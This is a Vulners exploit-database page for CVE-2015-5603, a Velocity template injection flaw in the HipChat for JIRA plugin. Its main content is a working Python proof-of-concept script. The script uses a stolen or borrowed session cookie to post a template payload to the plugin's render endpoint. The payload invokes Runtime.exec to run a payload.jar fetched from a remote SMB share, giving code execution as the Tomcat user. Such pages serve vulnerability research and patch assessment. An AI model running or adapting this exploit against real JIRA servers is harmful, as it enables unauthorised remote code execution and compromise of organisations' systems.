Vulners
Lucene search
JIRA and HipChat for JIRA Plugin Velocity Template Injection Vulnerability
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Atlassian HipChat for Jira Plugin Velocity Template Injection Exploit | 5 Dec 201500:00 | – | zdt |
 | Atlassian JIRA 6.4.x < 6.4.11 Multiple Vulnerabilities | 26 Jan 201700:00 | – | nessus |
 | CVE-2015-5603: HipChat for JIRA plugin - Velocity Template Injection | 18 Aug 201504:53 | – | atlassian |
| CVE-2015-5603: HipChat for JIRA plugin - Velocity Template Injection | 18 Aug 201504:53 | – | atlassian |
| CVE-2015-5603: HipChat for JIRA plugin - Velocity Template Injection | 18 Aug 201504:53 | – | atlassian |
 | CVE-2015-5603 | 28 Oct 201500:00 | – | circl |
 | Atlassian JIRA HipChat for JIRA Plugin Code Injection Vulnerability | 25 Sep 201500:00 | – | cnvd |
 | CVE-2015-5603 | 21 Sep 201519:00 | – | cve |
 | CVE-2015-5603 | 21 Sep 201519:00 | – | cvelist |
 | JIRA and HipChat for JIRA Plugin - Velocity Template Injection | 28 Oct 201500:00 | – | exploitdb |
10
############################################################################
# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability
# Date: 2015-08-26
# CVE ID: CVE-2015-5603
# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
#
# Product: JIRA and the HipChat for JIRA plugin.
# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
# Affected JIRA product versions: 6.3.5 <= version < 6.4.11
#
# Discovered internally by Atlassian (vendor)
# Proof of concept script by Chris Wood <[email protected]>
#
# Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64
# Allows any authenticated JIRA user to execute code running as Tomcat identity
############################################################################
import urllib2
import json
# cookie of any authenticated session (ex. jira-user)
JSESSIONID = '541631B0D72EF1C71E932953F4760A70'
# jira server
RHOST = 'http://192.168.2.15:8080'
# samba public share, read/write to anonymous users
CMD = ' java -jar \\\\192.168.2.234\\public\\payload.jar '
data = {
'message': ' $i18n.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null).invoke(null, null).exec(\'' + CMD + '\').waitFor() '
}
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID))
urllib2.install_opener(opener)
req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
print('##################################')
print('######### CVE-2015-5603 ##########')
print('##################################')
print(response.read())
# 0day.today [2018-03-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2015 00:00Current
EPSS0.76355